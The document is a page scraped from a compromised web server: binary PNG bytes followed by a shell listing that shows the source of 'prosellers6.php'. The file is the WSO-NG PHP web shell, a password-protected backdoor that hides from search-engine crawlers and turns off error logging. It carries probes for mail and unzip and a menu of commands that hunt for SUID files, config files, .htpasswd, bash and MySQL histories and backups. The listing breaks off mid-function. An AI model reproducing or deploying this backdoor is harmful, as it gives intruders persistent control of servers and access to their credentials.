PNG  IHDRQgAMA a cHRMz&u0`:pQ<bKGDgmIDATxwUﹻ& ^CX(J I@ "% (** BX +*i"]j(IH{~R)[~>h{}gy)I$Ij .I$I$ʊy@}x.: $I$Ii}VZPC)I$IF ^0ʐJ$I$Q^}{"r=OzI$gRZeC.IOvH eKX $IMpxsk.쒷/&r[޳<v| .I~)@$updYRa$I |M.e JaֶpSYR6j>h%IRز if&uJ)M$I vLi=H;7UJ,],X$I1AҒJ$ XY XzI@GNҥRT)E@;]K*Mw;#5_wOn~\ DC&$(A5 RRFkvIR}l!RytRl;~^ǷJj اy뷦BZJr&ӥ8Pjw~vnv X^(I;4R=P[3]J,]ȏ~:3?[ a&e)`e*P[4]T=Cq6R[ ~ޤrXR Հg(t_HZ-Hg M$ãmL5R uk*`%C-E6/%[t X.{8P9Z.vkXŐKjgKZHg(aK9ڦmKjѺm_ \#$5,)-  61eJ,5m| r'= &ڡd%-]J on Xm|{ RҞe $eڧY XYrԮ-a7RK6h>n$5AVڴi*ֆK)mѦtmr1p| q:흺,)Oi*ֺK)ܬ֦K-5r3>0ԔHjJئEZj,%re~/z%jVMڸmrt)3]J,T K֦OvԒgii*bKiNO~%PW0=dii2tJ9Jݕ{7"I P9JKTbu,%r"6RKU}Ij2HKZXJ,妝 XYrP ެ24c%i^IK|.H,%rb:XRl1X4Pe/`x&P8Pj28Mzsx2r\zRPz4J}yP[g=L) .Q[6RjWgp FIH*-`IMRaK9TXcq*I y[jE>cw%gLRԕiFCj-ďa`#e~I j,%r,)?[gp FI˨mnWX#>mʔ XA DZf9,nKҲzIZXJ,L#kiPz4JZF,I,`61%2s $,VOϚ2/UFJfy7K> X+6 STXIeJILzMfKm LRaK9%|4p9LwJI!`NsiazĔ)%- XMq>pk$-$Q2x#N ؎-QR}ᶦHZډ)J,l#i@yn3LN`;nڔ XuX5pF)m|^0(>BHF9(cզEerJI rg7 4I@z0\JIi䵙RR0s;$s6eJ,`n 䂦0a)S)A 1eJ,堌#635RIgpNHuTH_SԕqVe ` &S)>p;S$魁eKIuX`I4춒o}`m$1":PI<[v9^\pTJjriRŭ P{#{R2,`)e-`mgj~1ϣLKam7&U\j/3mJ,`F;M'䱀 .KR#)yhTq;pcK9(q!w?uRR,n.yw*UXj#\]ɱ(qv2=RqfB#iJmmL<]Y͙#$5 uTU7ӦXR+q,`I}qL'`6Kͷ6r,]0S$- [RKR3oiRE|nӦXR.(i:LDLTJjY%o:)6rxzҒqTJjh㞦I.$YR.ʼnGZ\ֿf:%55 I˼!6dKxm4E"mG_ s? .e*?LRfK9%q#uh$)i3ULRfK9yxm܌bj84$i1U^@Wbm4uJ,ҪA>_Ij?1v32[gLRD96oTaR׿N7%L2 NT,`)7&ƝL*꽙yp_$M2#AS,`)7$rkTA29_Iye"|/0t)$n XT2`YJ;6Jx".e<`$) PI$5V4]29SRI>~=@j]lp2`K9Jaai^" Ԋ29ORI%:XV5]JmN9]H;1UC39NI%Xe78t)a;Oi Ҙ>Xt"~G>_mn:%|~ޅ_+]$o)@ǀ{hgN;IK6G&rp)T2i୦KJuv*T=TOSV>(~D>dm,I*Ɛ:R#ۙNI%D>G.n$o;+#RR!.eU˽TRI28t)1LWϚ>IJa3oFbu&:tJ*(F7y0ZR ^p'Ii L24x| XRI%ۄ>S1]Jy[zL$adB7.eh4%%누>WETf+3IR:I3Xה)3אOۦSRO'ٺ)S}"qOr[B7ϙ.edG)^ETR"RtRݜh0}LFVӦDB^k_JDj\=LS(Iv─aTeZ%eUAM-0;~˃@i|l @S4y72>sX-vA}ϛBI!ݎߨWl*)3{'Y|iSlEڻ(5KtSI$Uv02,~ԩ~x;P4ցCrO%tyn425:KMlD ^4JRxSهF_}شJTS6uj+ﷸk$eZO%G*^V2u3EMj3k%)okI]dT)URKDS 7~m@TJR~荪fT"֛L \sM -0T KfJz+nإKr L&j()[E&I ߴ>e FW_kJR|!O:5/2跌3T-'|zX ryp0JS ~^F>-2< `*%ZFP)bSn"L :)+pʷf(pO3TMW$~>@~ū:TAIsV1}S2<%ޟM?@iT ,Eūoz%i~g|`wS(]oȤ8)$ ntu`өe`6yPl IzMI{ʣzʨ )IZ2= ld:5+請M$-ї;U>_gsY$ÁN5WzWfIZ)-yuXIfp~S*IZdt;t>KūKR|$#LcԀ+2\;kJ`]YǔM1B)UbG"IRߊ<xܾӔJ0Z='Y嵤 Leveg)$znV-º^3Ւof#0Tfk^Zs[*I꯳3{)ˬW4Ւ4 OdpbZRS|*I 55#"&-IvT&/윚Ye:i$ 9{LkuRe[I~_\ؠ%>GL$iY8 9ܕ"S`kS.IlC;Ҏ4x&>u_0JLr<J2(^$5L s=MgV ~,Iju> 7r2)^=G$1:3G< `J3~&IR% 6Tx/rIj3O< ʔ&#f_yXJiގNSz; Tx(i8%#4 ~AS+IjerIUrIj362v885+IjAhK__5X%nV%Iͳ-y|7XV2v4fzo_68"S/I-qbf; LkF)KSM$ Ms>K WNV}^`-큧32ŒVؙGdu,^^m%6~Nn&͓3ŒVZMsRpfEW%IwdǀLm[7W&bIRL@Q|)* i ImsIMmKmyV`i$G+R 0tV'!V)֏28vU7͒vHꦼtxꗞT ;S}7Mf+fIRHNZUkUx5SAJㄌ9MqμAIRi|j5)o*^'<$TwI1hEU^c_j?Е$%d`z cyf,XO IJnTgA UXRD }{H}^S,P5V2\Xx`pZ|Yk:$e ~ @nWL.j+ϝYb퇪bZ BVu)u/IJ_ 1[p.p60bC >|X91P:N\!5qUB}5a5ja `ubcVxYt1N0Zzl4]7­gKj]?4ϻ *[bg$)+À*x쳀ogO$~,5 زUS9 lq3+5mgw@np1sso Ӻ=|N6 /g(Wv7U;zωM=wk,0uTg_`_P`uz?2yI!b`kĸSo+Qx%!\οe|އԁKS-s6pu_(ֿ$i++T8=eY; צP+phxWQv*|p1. ά. XRkIQYP,drZ | B%wP|S5`~́@i޾ E;Չaw{o'Q?%iL{u D?N1BD!owPHReFZ* k_-~{E9b-~P`fE{AܶBJAFO wx6Rox5 K5=WwehS8 (JClJ~ p+Fi;ŗo+:bD#g(C"wA^ r.F8L;dzdIHUX݆ϞXg )IFqem%I4dj&ppT{'{HOx( Rk6^C٫O.)3:s(۳(Z?~ٻ89zmT"PLtw䥈5&b<8GZ-Y&K?e8,`I6e(֍xb83 `rzXj)F=l($Ij 2*(F?h(/9ik:I`m#p3MgLaKjc/U#n5S# m(^)=y=đx8ŬI[U]~SцA4p$-F i(R,7Cx;X=cI>{Km\ o(Tv2vx2qiiDJN,Ҏ!1f 5quBj1!8 rDFd(!WQl,gSkL1Bxg''՞^ǘ;pQ P(c_ IRujg(Wz bs#P­rz> k c&nB=q+ؔXn#r5)co*Ũ+G?7< |PQӣ'G`uOd>%Mctz# Ԫڞ&7CaQ~N'-P.W`Oedp03C!IZcIAMPUۀ5J<\u~+{9(FbbyAeBhOSܳ1 bÈT#ŠyDžs,`5}DC-`̞%r&ڙa87QWWp6e7 Rϫ/oY ꇅ Nܶըtc!LA T7V4Jsū I-0Pxz7QNF_iZgúWkG83 0eWr9 X]㾮݁#Jˢ C}0=3ݱtBi]_ &{{[/o[~ \q鯜00٩|cD3=4B_b RYb$óBRsf&lLX#M*C_L܄:gx)WΘsGSbuL rF$9';\4Ɍq'n[%p.Q`u hNb`eCQyQ|l_C>Lb꟟3hSb #xNxSs^ 88|Mz)}:](vbۢamŖ࿥ 0)Q7@0=?^k(*J}3ibkFn HjB׻NO z x}7p 0tfDX.lwgȔhԾŲ }6g E |LkLZteu+=q\Iv0쮑)QٵpH8/2?Σo>Jvppho~f>%bMM}\//":PTc(v9v!gոQ )UfVG+! 35{=x\2+ki,y$~A1iC6#)vC5^>+gǵ@1Hy٪7u;p psϰu/S <aʸGu'tD1ԝI<pg|6j'p:tպhX{o(7v],*}6a_ wXRk,O]Lܳ~Vo45rp"N5k;m{rZbΦ${#)`(Ŵg,;j%6j.pyYT?}-kBDc3qA`NWQū20/^AZW%NQ MI.X#P#,^Ebc&?XR tAV|Y.1!؅⨉ccww>ivl(JT~ u`ٵDm q)+Ri x/x8cyFO!/*!/&,7<.N,YDŽ&ܑQF1Bz)FPʛ?5d 6`kQձ λc؎%582Y&nD_$Je4>a?! ͨ|ȎWZSsv8 j(I&yj Jb5m?HWp=g}G3#|I,5v珿] H~R3@B[☉9Ox~oMy=J;xUVoj bUsl_35t-(ՃɼRB7U!qc+x4H_Qo֮$[GO<4`&č\GOc[.[*Af%mG/ ňM/r W/Nw~B1U3J?P&Y )`ѓZ1p]^l“W#)lWZilUQu`-m|xĐ,_ƪ|9i:_{*(3Gѧ}UoD+>m_?VPۅ15&}2|/pIOʵ> GZ9cmíتmnz)yߐbD >e}:) r|@R5qVSA10C%E_'^8cR7O;6[eKePGϦX7jb}OTGO^jn*媓7nGMC t,k31Rb (vyܴʭ!iTh8~ZYZp(qsRL ?b}cŨʊGO^!rPJO15MJ[c&~Z`"ѓޔH1C&^|Ш|rʼ,AwĴ?b5)tLU)F| &g٣O]oqSUjy(x<Ϳ3 .FSkoYg2 \_#wj{u'rQ>o;%n|F*O_L"e9umDds?.fuuQbIWz |4\0 sb;OvxOSs; G%T4gFRurj(֍ڑb uԖKDu1MK{1^ q; C=6\8FR艇!%\YÔU| 88m)֓NcLve C6z;o&X x59:q61Z(T7>C?gcļxѐ Z oo-08jہ x,`' ҔOcRlf~`jj".Nv+sM_]Zk g( UOPyεx%pUh2(@il0ݽQXxppx-NS( WO+轾 nFߢ3M<;z)FBZjciu/QoF 7R¥ ZFLF~#ȣߨ^<쩡ݛкvџ))ME>ώx4m#!-m!L;vv#~Y[đKmx9.[,UFS CVkZ +ߟrY٧IZd/ioi$%͝ب_ֶX3ܫhNU ZZgk=]=bbJS[wjU()*I =ώ:}-蹞lUj:1}MWm=̛ _ ¾,8{__m{_PVK^n3esw5ӫh#$-q=A̟> ,^I}P^J$qY~Q[ Xq9{#&T.^GVj__RKpn,b=`żY@^՝;z{paVKkQXj/)y TIc&F;FBG7wg ZZDG!x r_tƢ!}i/V=M/#nB8 XxЫ ^@CR<{䤭YCN)eKOSƟa $&g[i3.C6xrOc8TI;o hH6P&L{@q6[ Gzp^71j(l`J}]e6X☉#͕ ׈$AB1Vjh㭦IRsqFBjwQ_7Xk>y"N=MB0 ,C #o6MRc0|$)ف"1!ixY<B9mx `,tA>)5ػQ?jQ?cn>YZe Tisvh# GMމȇp:ԴVuږ8ɼH]C.5C!UV;F`mbBk LTMvPʍϤj?ԯ/Qr1NB`9s"s TYsz &9S%U԰> {<ؿSMxB|H\3@!U| k']$U+> |HHMLޢ?V9iD!-@x TIî%6Z*9X@HMW#?nN ,oe6?tQwڱ.]-y':mW0#!J82qFjH -`ѓ&M0u Uγmxϵ^-_\])@0Rt.8/?ٰCY]x}=sD3ojަЫNuS%U}ԤwHH>ڗjܷ_3gN q7[q2la*ArǓԖ+p8/RGM ]jacd(JhWko6ڎbj]i5Bj3+3!\j1UZLsLTv8HHmup<>gKMJj0@H%,W΃7R) ">c, xixј^ aܖ>H[i.UIHc U1=yW\=S*GR~)AF=`&2h`DzT󑓶J+?W+}C%P:|0H܆}-<;OC[~o.$~i}~HQ TvXΈr=b}$vizL4:ȰT|4~*!oXQR6Lk+#t/g lԁߖ[Jڶ_N$k*". xsxX7jRVbAAʯKҎU3)zSNN _'s?f)6X!%ssAkʱ>qƷb hg %n ~p1REGMHH=BJiy[<5 ǁJҖgKR*倳e~HUy)Ag,K)`Vw6bRR:qL#\rclK/$sh*$ 6덤 KԖc 3Z9=Ɣ=o>X Ώ"1 )a`SJJ6k(<c e{%kϊP+SL'TcMJWRm ŏ"w)qc ef꒵i?b7b('"2r%~HUS1\<(`1Wx9=8HY9m:X18bgD1u ~|H;K-Uep,, C1 RV.MR5άh,tWO8WC$ XRVsQS]3GJ|12 [vM :k#~tH30Rf-HYݺ-`I9%lIDTm\ S{]9gOڒMNCV\G*2JRŨ;Rҏ^ڽ̱mq1Eu?To3I)y^#jJw^Ńj^vvlB_⋌P4x>0$c>K†Aļ9s_VjTt0l#m>E-,,x,-W)سo&96RE XR.6bXw+)GAEvL)͞K4$p=Ũi_ѱOjb HY/+@θH9޼]Nԥ%n{ &zjT? Ty) s^ULlb,PiTf^<À] 62R^V7)S!nllS6~͝V}-=%* ʻ>G DnK<y&>LPy7'r=Hj 9V`[c"*^8HpcO8bnU`4JȪAƋ#1_\ XϘHPRgik(~G~0DAA_2p|J묭a2\NCr]M_0 ^T%e#vD^%xy-n}-E\3aS%yN!r_{ )sAw ڼp1pEAk~v<:`'ӭ^5 ArXOI驻T (dk)_\ PuA*BY]yB"l\ey hH*tbK)3 IKZ򹞋XjN n *n>k]X_d!ryBH ]*R 0(#'7 %es9??ښFC,ՁQPjARJ\Ρw K#jahgw;2$l*) %Xq5!U᢯6Re] |0[__64ch&_}iL8KEgҎ7 M/\`|.p,~`a=BR?xܐrQ8K XR2M8f ?`sgWS%" Ԉ 7R%$ N}?QL1|-эټwIZ%pvL3Hk>,ImgW7{E xPHx73RA @RS CC !\ȟ5IXR^ZxHл$Q[ŝ40 (>+ _C >BRt<,TrT {O/H+˟Pl6 I B)/VC<6a2~(XwV4gnXR ϱ5ǀHٻ?tw똤Eyxp{#WK qG%5],(0ӈH HZ])ג=K1j&G(FbM@)%I` XRg ʔ KZG(vP,<`[ Kn^ SJRsAʠ5xՅF`0&RbV tx:EaUE/{fi2;.IAwW8/tTxAGOoN?G}l L(n`Zv?pB8K_gI+ܗ #i?ޙ.) p$utc ~DžfՈEo3l/)I-U?aԅ^jxArA ΧX}DmZ@QLےbTXGd.^|xKHR{|ΕW_h] IJ`[G9{).y) 0X YA1]qp?p_k+J*Y@HI>^?gt.06Rn ,` ?);p pSF9ZXLBJPWjgQ|&)7! HjQt<| ؅W5 x W HIzYoVMGP Hjn`+\(dNW)F+IrS[|/a`K|ͻ0Hj{R,Q=\ (F}\WR)AgSG`IsnAR=|8$}G(vC$)s FBJ?]_u XRvύ6z ŨG[36-T9HzpW̞ú Xg큽=7CufzI$)ki^qk-) 0H*N` QZkk]/tnnsI^Gu't=7$ Z;{8^jB% IItRQS7[ϭ3 $_OQJ`7!]W"W,)Iy W AJA;KWG`IY{8k$I$^%9.^(`N|LJ%@$I}ֽp=FB*xN=gI?Q{٥4B)mw $Igc~dZ@G9K X?7)aK%݅K$IZ-`IpC U6$I\0>!9k} Xa IIS0H$I H ?1R.Чj:4~Rw@p$IrA*u}WjWFPJ$I➓/6#! LӾ+ X36x8J |+L;v$Io4301R20M I$-E}@,pS^ޟR[/s¹'0H$IKyfŸfVOπFT*a$I>He~VY/3R/)>d$I>28`Cjw,n@FU*9ttf$I~<;=/4RD~@ X-ѕzἱI$: ԍR a@b X{+Qxuq$IЛzo /~3\8ڒ4BN7$IҀj V]n18H$IYFBj3̵̚ja pp $Is/3R Ӻ-Yj+L;.0ŔI$Av? #!5"aʄj}UKmɽH$IjCYs?h$IDl843.v}m7UiI=&=0Lg0$I4: embe` eQbm0u? $IT!Sƍ'-sv)s#C0:XB2a w I$zbww{."pPzO =Ɔ\[ o($Iaw]`E).Kvi:L*#gР7[$IyGPI=@R 4yR~̮´cg I$I/<tPͽ hDgo 94Z^k盇΄8I56^W$I^0̜N?4*H`237}g+hxoq)SJ@p|` $I%>-hO0eO>\ԣNߌZD6R=K ~n($I$y3D>o4b#px2$yڪtzW~a $I~?x'BwwpH$IZݑnC㧄Pc_9sO gwJ=l1:mKB>Ab<4Lp$Ib o1ZQ@85b̍ S'F,Fe,^I$IjEdù{l4 8Ys_s Z8.x m"+{~?q,Z D!I$ϻ'|XhB)=…']M>5 rgotԎ 獽PH$IjIPhh)n#cÔqA'ug5qwU&rF|1E%I$%]!'3AFD/;Ck_`9 v!ٴtPV;x`'*bQa w I$Ix5 FC3D_~A_#O݆DvV?<qw+I$I{=Z8".#RIYyjǪ=fDl9%M,a8$I$Ywi[7ݍFe$s1ՋBVA?`]#!oz4zjLJo8$I$%@3jAa4(o ;p,,dya=F9ً[LSPH$IJYЉ+3> 5"39aZ<ñh!{TpBGkj}Sp $IlvF.F$I z< '\K*qq.f<2Y!S"-\I$IYwčjF$ w9 \ߪB.1v!Ʊ?+r:^!I$BϹB H"B;L'G[ 4U#5>੐)|#o0aڱ$I>}k&1`U#V?YsV x>{t1[I~D&(I$I/{H0fw"q"y%4 IXyE~M3 8XψL}qE$I[> nD?~sf ]o΁ cT6"?'_Ἣ $I>~.f|'!N?⟩0G KkXZE]ޡ;/&?k OۘH$IRۀwXӨ<7@PnS04aӶp.:@\IWQJ6sS%I$e5ڑv`3:x';wq_vpgHyXZ 3gЂ7{{EuԹn±}$I$8t;b|591nءQ"P6O5i }iR̈́%Q̄p!I䮢]O{H$IRϻ9s֧ a=`- aB\X0"+5"C1Hb?߮3x3&gşggl_hZ^,`5?ߎvĸ%̀M!OZC2#0x LJ0 Gw$I$I}<{Eb+y;iI,`ܚF:5ܛA8-O-|8K7s|#Z8a&><a&/VtbtLʌI$I$I$I$I$I$IRjDD%tEXtdate:create2022-05-31T04:40:26+00:00!Î%tEXtdate:modify2022-05-31T04:40:26+00:00|{2IENDB` sh-3ll

HOME


sh-3ll 1.0
DIR:/proc/thread-self/root/proc/thread-self/root/home/deltatra/.trash/
Upload File :
Current File : //proc/thread-self/root/proc/thread-self/root/home/deltatra/.trash/prosellers6.php
<?php
session_start();
error_reporting(0);
$password = "827ccb0eea8a706c4c34a16891f84e7b"; // 12345
$passtype = "MD5";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
    if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@define('WSO_VERSION','WSO-NG');

// Fix for setcookie vs set_cookie function name
if (!function_exists('set_cookie')) {
    function set_cookie($name, $value, $expire) {
        return setcookie($name, $value, $expire);
    }
}
@set_cookie("wsog","orb",time()+3600*24*7);

// Fix for get_magic_quotes_gpc() removal in PHP 8+
if (!function_exists('get_magic_quotes_gpc') || !get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes',$array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
}

$dir = md5(__FILE__);

if(isset($_GET['check'])){
    die("working");
}

if(isset($_GET['checksend'])){
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < 30; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    if(@mail($randomString.'@'.$randomString.'.com', "Hello", "Hello, dear user!")){
        die("check-result-1");
    } else {
        die("check-result-0");
    }
}

if(isset($_GET['checkzip'])){
    $filezip = 'checker_zip_file.zip';
    $filetxt = 'checker_zip_file.txt';
    $zip = new ZipArchive;
    if ($zip->open($filezip, ZipArchive::CREATE) === TRUE){
        $zip->addFromString($filetxt, 'test');
        $zip->close();
        $zip = new ZipArchive;
        $zip->open($filezip);
        $zip->extractTo(getcwd());
        $zip->close();
        @system("unzip ".$filezip);
        @shell_exec("unzip ".$filezip);
        @passthru("unzip ".$filezip);
        if(file_exists($filetxt)){
            @unlink($filezip);
            @unlink($filetxt);
            die("check-result-1");
        } else {
            @unlink($filezip);
            @unlink($filetxt);
            die("check-result-0");
        }
    } else {
        die("check-result-0");
    }
}

if(!empty($password) && $password !== 0) {
    if (isset($_POST['pass'])) {
        if ($passtype == "MD5") {
            $visitorpassword = md5($_POST['pass']);
        } elseif ($passtype == "SHA1") {
            $visitorpassword = sha1($_POST['pass']);
        } else {
            $visitorpassword = $_POST['pass'];
        }
        if($visitorpassword == $password){
            $_SESSION[$dir] = "OK";
        }
    } else if (isset($_GET['pass'])) {
        if ($passtype == "MD5") {
            $visitorpassword = md5($_GET['pass']);
        } elseif ($passtype == "SHA1") {
            $visitorpassword = sha1($_GET['pass']);
        } else {
            $visitorpassword = $_GET['pass'];
        }
        if($visitorpassword == $password){
            $_SESSION[$dir] = "OK";
        }
    }
    
    if (!isset($_SESSION[$dir]) || ($_SESSION[$dir] != "OK")) {
        die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }
} elseif ($password == 0) {
    $_SESSION[$dir] = "OK";
}

if(strtolower(substr(PHP_OS,0,3)) == "win") {
    $os = 'win';
} else {
    $os = 'nix';
}

// Fix for safe_mode removal in PHP 8+
if (version_compare(PHP_VERSION, '7.4.0', '>=')) {
    $safe_mode = false;
} else {
    $safe_mode = @ini_get('safe_mode');
}

if(!$safe_mode) {
    $disable_functions = @ini_get('disable_functions');
}

$home_cwd = @getcwd();
if(isset($_POST['c'])) {
    @chdir($_POST['c']);
}
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\","/",$home_cwd);
    $cwd = str_replace("\\","/",$cwd);
}
if($cwd[strlen($cwd)-1] != '/') {
    $cwd .= '/';
}

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'])) {
    $_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = (bool)$default_use_ajax;
}

if($os == 'win') {
    $aliases = array(
        "List Directory"=>"dir",
        "Find index.php in current dir"=>"dir /s /w /b index.php",
        "Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
        "Show active connections"=>"netstat -an",
        "Show running services"=>"net start",
        "User accounts"=>"net user",
        "Show computers"=>"net view",
        "ARP Table"=>"arp -a",
        "IP Configuration"=>"ipconfig /all"
    );
} else {
    $aliases = array(
        "List dir"=>"ls -lha",
        "list file attributes on a Linux second extended file system"=>"lsattr -va",
        "show opened ports"=>"netstat -an | grep -i listen",
        "process status"=>"ps aux",
        "Find"=>"",
        "find all suid files"=>"find / -type f -perm -04000 -ls",
        "find suid files in current dir"=>"find . -type f -perm -04000 -ls",
        "find all sgid files"=>"find / -type f -perm -02000 -ls",
        "find sgid files in current dir"=>"find . -type f -perm -02000 -ls",
        "find config.inc.php files"=>"find / -type f -name config.inc.php",
        "find config* files"=>"find / -type f -name \"config*\"",
        "find config* files in current dir"=>"find . -type f -name \"config*\"",
        "find all writable folders and files"=>"find / -perm -2 -ls",
        "find all writable folders and files in current dir"=>"find . -perm -2 -ls",
        "find all service.pwd files"=>"find / -type f -name service.pwd",
        "find service.pwd files in current dir"=>"find . -type f -name service.pwd",
        "find all .htpasswd files"=>"find / -type f -name .htpasswd",
        "find .htpasswd files in current dir"=>"find . -type f -name .htpasswd",
        "find all .bash_history files"=>"find / -type f -name .bash_history",
        "find .bash_history files in current dir"=>"find . -type f -name .bash_history",
        "find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
        "find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc",
        "Locate"=>"",
        "locate httpd.conf files"=>"locate httpd.conf",
        "locate vhosts.conf files"=>"locate vhosts.conf",
        "locate proftpd.conf files"=>"locate proftpd.conf",
        "locate psybnc.conf files"=>"locate psybnc.conf",
        "locate my.conf files"=>"locate my.conf",
        "locate admin.php files"=>"locate admin.php",
        "locate cfg.php files"=>"locate cfg.php",
        "locate conf.php files"=>"locate conf.php",
        "locate config.dat files"=>"locate config.dat",
        "locate config.php files"=>"locate config.php",
        "locate config.inc files"=>"locate config.inc",
        "locate config.inc.php"=>"locate config.inc.php",
        "locate config.default.php files"=>"locate config.default.php",
        "locate config* files "=>"locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files"=>"locate '.pwd'",
        "locate .sql files"=>"locate '.sql'",
        "locate .htpasswd files"=>"locate '.htpasswd'",
        "locate .bash_history files"=>"locate '.bash_history'",
        "locate .mysql_history files"=>"locate '.mysql_history'",
        "locate .fetchmailrc files"=>"locate '.fetchmailrc'",
        "locate backup files"=>"locate backup",
        "locate dump files"=>"locate dump",
        "locate priv files"=>"locate priv"
    );
}

function wsoHeader() {
    if(empty($_POST['charset'])) {
        $_POST['charset'] = $GLOBALS['default_charset'];
    }
    global $color;
    echo "<html><head>
    <meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset'] ."'>PRIV8 - <title>".$_SERVER['HTTP_HOST'] ." - WSO ".WSO_VERSION ."</title>
    <style>
        body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
        #particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
        body,td,th	{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
        table.info	{color:#C3C3C3;}
        table#toolsTbl {background-color: #060A10;}
        span,h1,a	{color:#fff !important;}
        span		{font-weight:bolder;}
        h1			{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
        div.content	{padding:5px;margin-left:5px;background-color:#060a10;}
        a			{text-decoration:none;}
        a:hover		{text-decoration:underline;}
        .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
        .tooltip:hover::after {opacity:1;visibility:visible;}
        .ml1		{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
        .bigarea	{min-width:100%;max-width:100%;height:400px;}
        input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
        label {position:relative}
        label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
        label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
        form		{margin:0px;}
        #toolsTbl	{text-align:center;}
        #fak 		{background:none;}
        #fak td 	{padding:5px 0 0 0;}
        iframe		{border:1px solid #060a10;}
        .toolsInp	{width:300px}
        .main th	{text-align:left;background-color:#060a10;}
        .main tr:hover{background-color:#354252;}
        .main td, th{vertical-align:middle;}
        input[type='submit']{background-color:#2E6E9C;}
        input[type='button']{background-color:#2E6E9C;}
        input[type='submit']:hover{background-color:#56AD15;}
        input[type='button']:hover{background-color:#56AD15;}
        .l1			{background-color:#202832;}
        pre			{font:9pt Courier New;}
    </style>
    <script>
        var c_ = '".htmlspecialchars($GLOBALS['cwd']) ."';
        var a_ = '".htmlspecialchars(@$_POST['a']) ."'
        var charset_ = '".htmlspecialchars(@$_POST['charset']) ."';
        var p1_ = '".htmlspecialchars(@$_POST['p1'], ENT_QUOTES) ."';
        var p2_ = '".htmlspecialchars(@$_POST['p2'], ENT_QUOTES) ."';
        var p3_ = '".htmlspecialchars(@$_POST['p3'], ENT_QUOTES) ."';
        var p4_ = '".htmlspecialchars(@$_POST['p4'], ENT_QUOTES) ."';

        var d = document;
        function set(a,c,p1,p2,p3,charset) {
            if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
            if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
            if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
            if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
            if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
            if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
        }
        function g(a,c,p1,p2,p3,charset) {
            set(a,c,p1,p2,p3,charset);
            d.mf.submit();
        }
        function a(a,c,p1,p2,p3,charset) {
            set(a,c,p1,p2,p3,charset);
            var params = 'ajax=true';
            for(i=0;i<d.mf.elements.length;i++)
                params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
            sr('".addslashes($_SERVER['REQUEST_URI']) ."', params);
        }
        function sr(url, params) {
            if (window.XMLHttpRequest)
                req = new XMLHttpRequest();
            else if (window.ActiveXObject)
                req = new ActiveXObject('Microsoft.XMLHTTP');
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open('POST', url, true);
                req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
                req.send(params);
            }
        }
        function processReqChange() {
            if( (req.readyState == 4) )
                if(req.status == 200) {
                    var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
                    var arr=reg.exec(req.responseText);
                    eval(arr[2].substr(0, arr[1]));
                } else alert('Request error!');
        }
    </script>
    </head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
    <form method=post name=mf style='display:none;'>
    <input type=hidden name=a>
    <input type=hidden name=c>
    <input type=hidden name=p1>
    <input type=hidden name=p2>
    <input type=hidden name=p3>
    <input type=hidden name=charset>
    </form>";
    
    $freeSpace = @disk_free_space($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    
    $cwd_links = '';
    $path = explode("/",$GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0;$j<=$i;$j++)
